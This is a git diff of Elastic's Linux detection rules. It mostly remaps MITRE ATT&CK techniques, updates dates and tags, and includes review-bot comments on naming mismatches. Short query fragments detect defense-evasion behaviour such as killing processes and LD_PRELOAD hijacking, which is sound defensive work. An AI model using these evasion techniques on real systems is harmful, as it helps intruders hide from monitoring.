+reference = "https://attack.mitre.org/techniques/T1140/"
- [[rule.threat.technique]]
- name = "Deobfuscate/Decode Files or Information"
- id = "T1140"
- reference = "https://attack.mitre.org/techniques/T1140/"
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Execution"
- id = "TA0002"
- reference = "https://attack.mitre.org/tactics/TA0002/"
-
- [[rule.threat.technique]]
- id = "T1059"
- name = "Command and Scripting Interpreter"
- reference = "https://attack.mitre.org/techniques/T1059/"
-
- [[rule.threat.technique.subtechnique]]
- name = "Unix Shell"
- id = "T1059.004"
- reference = "https://attack.mitre.org/techniques/T1059/004/"
-
- [[rule.threat.technique]]
- name = "User Execution"
- id = "T1204"
- reference = "https://attack.mitre.org/techniques/T1204/"
-
- [[rule.threat.technique.subtechnique]]
- name = "Malicious File"
- id = "T1204.002"
- reference = "https://attack.mitre.org/techniques/T1204/002/"
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/linux/defense_evasion_journalctl_clear_logs.toml b/rules/linux/defense_evasion_journalctl_clear_logs.toml
index 093b7354d19..aa909745f68 100644
--- a/rules/linux/defense_evasion_journalctl_clear_logs.toml
+++ b/rules/linux/defense_evasion_journalctl_clear_logs.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/10/01"
 integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -117,16 +117,6 @@ id = "T1070.002"
 name = "Clear Linux or Mac System Logs"
 reference = "https://attack.mitre.org/techniques/T1070/002/"
-[[rule.threat.technique]]
-id = "T1562"
-name = "Impair Defenses"
-reference = "https://attack.mitre.org/techniques/T1562/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1562.001"
-name = "Disable or Modify Tools"
-reference = "https://attack.mitre.org/techniques/T1562/001/"
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
diff --git a/rules/linux/defense_evasion_kernel_module_removal.toml b/rules/linux/defense_evasion_kernel_module_removal.toml
index b2f955b40de..8a9075839fa 100644
--- a/rules/linux/defense_evasion_kernel_module_removal.toml
+++ b/rules/linux/defense_evasion_kernel_module_removal.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/04/24"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -135,21 +135,3 @@ reference = "https://attack.mitre.org/techniques/T1562/001/"
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1547"
-name = "Boot or Logon Autostart Execution"
-reference = "https://attack.mitre.org/techniques/T1547/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1547.006"
-name = "Kernel Modules and Extensions"
-reference = "https://attack.mitre.org/techniques/T1547/006/"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
diff --git a/rules/linux/defense_evasion_kill_command_executed.toml b/rules/linux/defense_evasion_kill_command_executed.toml
index 68a5e17a6e7..bc14d0952b7 100644
--- a/rules/linux/defense_evasion_kill_command_executed.toml
+++ b/rules/linux/defense_evasion_kill_command_executed.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/21"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -103,49 +103,20 @@ process.name:(kill or pkill or killall) and not (
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[rule.threat.tactic]
-name = "Defense Evasion"
-id = "TA0005"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
 [[rule.threat.technique]]
-id = "T1564"
-name = "Hide Artifacts"
-reference = "https://attack.mitre.org/techniques/T1564/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1564.001"
-name = "Hidden Files and Directories"
-reference = "https://attack.mitre.org/techniques/T1564/001/"
-
-[[rule.threat.technique]]
-name = "Impair Defenses"
 id = "T1562"
+name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
 [[rule.threat.technique.subtechnique]]
-name = "Indicator Blocking"
-id = "T1562.006"
-reference = "https://attack.mitre.org/techniques/T1562/006/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
+id = "T1562.001"
+name = "Disable or Modify Tools"
+reference = "https://attack.mitre.org/techniques/T1562/001/"
 [rule.threat.tactic]
-name = "Execution"
-id = "TA0002"
-reference = "https://attack.mitre.org/tactics/TA0002/"
-
-[[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1059.004"
-name = "Unix Shell"
-reference = "https://attack.mitre.org/techniques/T1059/004/"
-
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["host.id", "process.parent.executable"]
diff --git a/rules/linux/defense_evasion_kthreadd_masquerading.toml b/rules/linux/defense_evasion_kthreadd_masquerading.toml
index 847734d3990..bac0dbe6c01 100644
--- a/rules/linux/defense_evasion_kthreadd_masquerading.toml
+++ b/rules/linux/defense_evasion_kthreadd_masquerading.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/02/01"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -112,14 +112,9 @@ name = "Masquerading"
 reference = "https://attack.mitre.org/techniques/T1036/"
 [[rule.threat.technique.subtechnique]]
-id = "T1036.004"
-name = "Masquerade Task or Service"
-reference = "https://attack.mitre.org/techniques/T1036/004/"
-
-[[rule.threat.technique]]
-id = "T1564"
-name = "Hide Artifacts"
-reference = "https://attack.mitre.org/techniques/T1564/"
+id = "T1036.005"
+name = "Match Legitimate Resource Name or Location"
+reference = "https://attack.mitre.org/techniques/T1036/005/"
 [rule.threat.tactic]
 id = "TA0005"
diff --git a/rules/linux/defense_evasion_ld_preload_cmdline.toml b/rules/linux/defense_evasion_ld_preload_cmdline.toml
index 3ac9270442c..5b6c4da06bc 100644
--- a/rules/linux/defense_evasion_ld_preload_cmdline.toml
+++ b/rules/linux/defense_evasion_ld_preload_cmdline.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/04/30"
 integration = ["endpoint", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -79,16 +79,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "high"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Defense Evasion",
- "Tactic: Persistence",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
- "Data Source: Crowdstrike",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide", "Data Source: Crowdstrike"]
 timestamp_override = "event.ingested"
 type = "new_terms"
 query = '''
@@ -111,57 +102,20 @@ process.args:-c and process.command_line:(*LD_LIBRARY_PATH=* or *LD_PRELOAD=*)
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Defense Evasion"
- id = "TA0005"
- reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
- [[rule.threat.technique]]
- name = "Hijack Execution Flow"
- id = "T1574"
- reference = "https://attack.mitre.org/techniques/T1574/"
-
- [[rule.threat.technique.subtechnique]]
- name = "Dynamic Linker Hijacking"
- id = "T1574.006"
- reference = "https://attack.mitre.org/techniques/T1574/006/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
- [rule.threat.tactic]
- name = "Persistence"
- id = "TA0003"
- reference = "https://attack.mitre.org/tactics/TA0003/"
-
- [[rule.threat.technique]]
- name = "Hijack Execution Flow"
- id = "T1574"
- reference = "https://attack.mitre.org/techniques/T1574/"
-
- [[rule.threat.technique.subtechnique]]
- name = "Dynamic Linker Hijacking"
- id = "T1574.006"
- reference = "https://attack.mitre.org/techniques/T1574/006/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
- [rule.threat.tactic]
- name = "Privilege Escalation"
- id = "TA0004"
- reference = "https://attack.mitre.org/tactics/TA0004/"
-
- [[rule.threat.technique]]
- name = "Hijack Execution Flow"
- id = "T1574"
- reference = "https://attack.mitre.org/techniques/T1574/"
-
- [[rule.threat.technique.subtechnique]]
- name = "Dynamic Linker Hijacking"
- id = "T1574.006"
- reference = "https://attack.mitre.org/techniques/T1574/006/"
+[[rule.threat.technique.subtechnique]]
+id = "T1574.006"
+name = "Dynamic Linker Hijacking"
+reference = "https://attack.mitre.org/techniques/T1574/006/"
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["process.parent.name", "process.command_line", "host.id"]
diff --git a/rules/linux/defense_evasion_ld_so_creation.toml b/rules/linux/defense_evasion_ld_so_creation.toml
index 8559b7e0144..fcf1c7d2429 100644
--- a/rules/linux/defense_evasion_ld_so_creation.toml
+++ b/rules/linux/defense_evasion_ld_so_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/12/16"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -80,18 +80,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Defense Evasion",
- "Tactic: Execution",
- "Tactic: Persistence",
- "Data Source: Elastic Defend",
- "Data Source: SentinelOne",
- "Data Source: Elastic Endgame",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -119,37 +108,6 @@ not (
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1218"
-name = "System Binary Proxy Execution"
-reference = "https://attack.mitre.org/techniques/T1218/"
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1059.004"
-name = "Unix Shell"
-reference = "https://attack.mitre.org/techniques/T1059/004/"
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1574"
 name = "Hijack Execution Flow"
diff --git a/rules/linux/defense_evasion_multi_base64_decoding_attempt.toml b/rules/linux/defense_evasion_multi_base64_decoding_attempt.toml
index 14c9ecdfc1d..1f605570a16 100644
--- a/rules/linux/defense_evasion_multi_base64_decoding_attempt.toml
+++ b/rules/linux/defense_evasion_multi_base64_decoding_attempt.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/07/24"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -85,15 +85,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Defense Evasion",
- "Tactic: Execution",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide"
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 type = "eql"
 query = '''
 sequence by process.parent.entity_id with maxspan=3s
@@ -120,45 +112,12 @@ sequence by process.parent.entity_id with maxspan=3s
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Defense Evasion"
- id = "TA0005"
- reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat.technique]]
+id = "T1140"
+name = "Deobfuscate/Decode Files or Information"
+reference = "https://attack.mitre.org/techniques/T1140/"
- [[rule.threat.technique]]
- name = "Obfuscated Files or Information"
- id = "T1027"
- reference = "https://attack.mitre.org/techniques/T1027/"
-
- [[rule.threat.technique]]
- name = "Deobfuscate/Decode Files or Information"
- id = "T1140"
- reference = "https://attack.mitre.org/techniques/T1140/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
- [rule.threat.tactic]
- name = "Execution"
- id = "TA0002"
- reference = "https://attack.mitre.org/tactics/TA0002/"
-
- [[rule.threat.technique]]
- id = "T1059"
- name = "Command and Scripting Interpreter"
- reference = "https://attack.mitre.org/techniques/T1059/"
-
- [[rule.threat.technique.subtechnique]]
- name = "Unix Shell"
- id = "T1059.004"
- reference = "https://attack.mitre.org/techniques/T1059/004/"
-
- [[rule.threat.technique]]
- name = "User Execution"
- id = "T1204"
- reference = "https://attack.mitre.org/techniques/T1204/"
-
- [[rule.threat.technique.subtechnique]]
- name = "Malicious File"
- id = "T1204.002"
- reference = "https://attack.mitre.org/techniques/T1204/002/"
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/linux/defense_evasion_potential_kubectl_impersonation.toml b/rules/linux/defense_evasion_potential_kubectl_impersonation.toml
index 105dced6160..6be08ce102a 100644
--- a/rules/linux/defense_evasion_potential_kubectl_impersonation.toml
+++ b/rules/linux/defense_evasion_potential_kubectl_impersonation.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "cloud
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/02/05"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -91,21 +91,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "Domain: Container",
- "Domain: Kubernetes",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Defense Evasion",
- "Tactic: Discovery",
- "Data Source: Elastic Endgame",
- "Data Source: Elastic Defend",
- "Data Source: Auditd Manager",
- "Data Source: SentinelOne",
- "Data Source: Elastic Defend for Containers",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "Domain: Container", "Domain: Kubernetes", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Data Source: SentinelOne", "Data Source: Elastic Defend for Containers", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -134,11 +120,6 @@ id = "T1550.001"
 name = "Application Access Token"
 reference = "https://attack.mitre.org/techniques/T1550/001/"
-[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
@@ -148,16 +129,11 @@ reference = "https://attack.mitre.org/tactics/TA0005/"
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1552"
-name = "Unsecured Credentials"
-reference = "https://attack.mitre.org/techniques/T1552/"
-
-[[rule.threat.technique]]
-id = "T1528"
-name = "Steal Application Access Token"
-reference = "https://attack.mitre.org/techniques/T1528/"
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
 [rule.threat.tactic]
-id = "TA0006"
-name = "Credential Access"
-reference = "https://attack.mitre.org/tactics/TA0006/"
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/linux/defense_evasion_potential_kubectl_masquerading.toml b/rules/linux/defense_evasion_potential_kubectl_masquerading.toml
index f68521c8f2e..6da26421c09 100644
--- a/rules/linux/defense_evasion_potential_kubectl_masquerading.toml
+++ b/rules/linux/defense_evasion_potential_kubectl_masquerading.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "cloud_de
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/02/05"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -148,11 +148,6 @@ id = "T1036.003"
 name = "Rename Legitimate Utilities"
 reference = "https://attack.mitre.org/techniques/T1036/003/"
-[[rule.threat.technique]]
-id = "T1564"
-name = "Hide Artifacts"
-reference = "https://attack.mitre.org/techniques/T1564/"
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
diff --git a/rules/linux/defense_evasion_potential_proot_exploits.toml b/rules/linux/defense_evasion_potential_proot_exploits.toml
index 1761b636315..ba241949298 100644
--- a/rules/linux/defense_evasion_potential_proot_exploits.toml
+++ b/rules/linux/defense_evasion_potential_proot_exploits.toml
@@ -2,7 +2,7 @@ creation_date = "2023/03/07" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -89,17 +89,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -111,11 +101,24 @@ process.parent.name == "proot" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1211" -name = "Exploitation for Defense Evasion" -reference = "https://attack.mitre.org/techniques/T1211/" +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/defense_evasion_prctl_process_name_tampering.toml b/rules/linux/defense_evasion_prctl_process_name_tampering.toml index 12d0ba4e5fe..914dd6c4c6f 100644 
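Review bot: In the `@@ -111,11 +101,24 @@` hunk the only technique changes from T1211 Exploitation for Defense Evasion to T1610 Deploy Container, yet the file is still `defense_evasion_potential_proot_exploits.toml` and the rule `name`/`description` (outside this hunk) presumably still speak of exploits. With the mapping no longer referencing exploitation, check that the name, description and investigation guide describe what the query actually matches (the visible context shows `process.parent.name == "proot"`), so the rule text and its ATT&CK mapping tell the same story. Adding the second `[[rule.threat]]` entry for TA0002 with the same T1610 is consistent with ATT&CK, which lists that technique under both Defense Evasion and Execution.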
--- a/rules/linux/defense_evasion_prctl_process_name_tampering.toml +++ b/rules/linux/defense_evasion_prctl_process_name_tampering.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/09" integration = ["auditd_manager"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -113,9 +113,9 @@ name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" [[rule.threat.technique.subtechnique]] -id = "T1036.005" -name = "Match Legitimate Resource Name or Location" -reference = "https://attack.mitre.org/techniques/T1036/005/" +id = "T1036.011" +name = "Overwrite Process Arguments" +reference = "https://attack.mitre.org/techniques/T1036/011/" [rule.threat.tactic] id = "TA0005" diff --git a/rules/linux/defense_evasion_rename_esxi_files.toml b/rules/linux/defense_evasion_rename_esxi_files.toml index 42658fe2b44..abe2549a743 100644 --- a/rules/linux/defense_evasion_rename_esxi_files.toml +++ b/rules/linux/defense_evasion_rename_esxi_files.toml @@ -2,7 +2,7 @@ creation_date = "2023/04/11" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -47,14 +47,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Impact", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -110,16 +103,21 @@ VMware ESXi files are critical for virtual machine operations, storing configura framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" +id = "T1486" +name = "Data Encrypted for Impact" +reference = "https://attack.mitre.org/techniques/T1486/" + +[[rule.threat.technique]] +id = "T1491" +name = "Defacement" +reference = "https://attack.mitre.org/techniques/T1491/" [[rule.threat.technique.subtechnique]] -id = "T1036.003" -name = "Rename Legitimate Utilities" -reference = "https://attack.mitre.org/techniques/T1036/003/" +id = "T1491.001" +name = "Internal Defacement" +reference = "https://attack.mitre.org/techniques/T1491/001/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/linux/defense_evasion_ssl_certificate_deletion.toml b/rules/linux/defense_evasion_ssl_certificate_deletion.toml index d5ec0c2be7b..2254deba1ee 100644 --- a/rules/linux/defense_evasion_ssl_certificate_deletion.toml +++ b/rules/linux/defense_evasion_ssl_certificate_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2024/08/28" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -105,16 +105,6 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1070" -name = "Indicator Removal" -reference = "https://attack.mitre.org/techniques/T1070/" - -[[rule.threat.technique.subtechnique]] -id = "T1070.004" -name = "File Deletion" -reference = "https://attack.mitre.org/techniques/T1070/004/" - [[rule.threat.technique]] id = "T1553" name = "Subvert Trust Controls" 
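Review bot: After the `@@ -110,16 +103,21 @@` hunk `defense_evasion_rename_esxi_files.toml` maps only to TA0040 Impact, so the `defense_evasion_` filename prefix no longer matches any tactic on the rule; the same happens to `defense_evasion_user_or_group_deletion.toml`, which moves to TA0040/T1531 in a later hunk. If nothing is derived from the filename this is cosmetic, but anyone browsing `rules/linux/` by tactic prefix will look in the wrong place, so a follow-up rename (e.g. an `impact_` prefix) would keep the tree navigable without bloating this commit. The new `[[rule.threat.technique.subtechnique]]` for T1491.001 is placed directly after the T1491 table, which is what TOML needs for it to attach to that technique rather than to T1486.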
diff --git a/rules/linux/defense_evasion_sus_utility_executed_via_tmux_or_screen.toml b/rules/linux/defense_evasion_sus_utility_executed_via_tmux_or_screen.toml index 215cc1c7e9e..efc5b4ccb61 100644 --- a/rules/linux/defense_evasion_sus_utility_executed_via_tmux_or_screen.toml +++ b/rules/linux/defense_evasion_sus_utility_executed_via_tmux_or_screen.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/04" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -84,9 +84,9 @@ process where host.os.type == "linux" and event.type == "start" and framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" +id = "T1202" +name = "Indirect Command Execution" +reference = "https://attack.mitre.org/techniques/T1202/" [rule.threat.tactic] id = "TA0005" diff --git a/rules/linux/defense_evasion_suspicious_path_mounted.toml b/rules/linux/defense_evasion_suspicious_path_mounted.toml index 33accceabc2..b5156549894 100644 --- a/rules/linux/defense_evasion_suspicious_path_mounted.toml +++ b/rules/linux/defense_evasion_suspicious_path_mounted.toml @@ -3,7 +3,7 @@ creation_date = "2025/04/25" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -114,6 +114,11 @@ id = "T1564" name = "Hide Artifacts" reference = "https://attack.mitre.org/techniques/T1564/" +[[rule.threat.technique.subtechnique]] +id = "T1564.001" +name = "Hidden Files and Directories" +reference = "https://attack.mitre.org/techniques/T1564/001/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/defense_evasion_symlink_binary_to_writable_dir.toml b/rules/linux/defense_evasion_symlink_binary_to_writable_dir.toml index 5f5aad743d2..daf5a725550 100644 
--- a/rules/linux/defense_evasion_symlink_binary_to_writable_dir.toml +++ b/rules/linux/defense_evasion_symlink_binary_to_writable_dir.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -90,26 +90,20 @@ process.parent.args:(/usr/bin/qemu-aarch64-static or /usr/sbin/weak-modules or / [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Defense Evasion" - id = "TA0005" - reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" - [[rule.threat.technique]] - name = "Hijack Execution Flow" - id = "T1574" - reference = "https://attack.mitre.org/techniques/T1574/" - - [[rule.threat.technique]] - name = "Indirect Command Execution" - id = "T1202" - reference = "https://attack.mitre.org/techniques/T1202/" - - [[rule.threat.technique]] - name = "Hide Artifacts" - id = "T1564" - reference = "https://attack.mitre.org/techniques/T1564/" +[[rule.threat.technique.subtechnique]] +id = "T1036.003" +name = "Rename Legitimate Utilities" +reference = "https://attack.mitre.org/techniques/T1036/003/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.parent.name"] diff --git a/rules/linux/defense_evasion_sysctl_kernel_feature_activity.toml b/rules/linux/defense_evasion_sysctl_kernel_feature_activity.toml index b1e0758e17c..fd5e8cd4af8 100644 --- a/rules/linux/defense_evasion_sysctl_kernel_feature_activity.toml +++ b/rules/linux/defense_evasion_sysctl_kernel_feature_activity.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/29" integration = ["endpoint", "crowdstrike"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
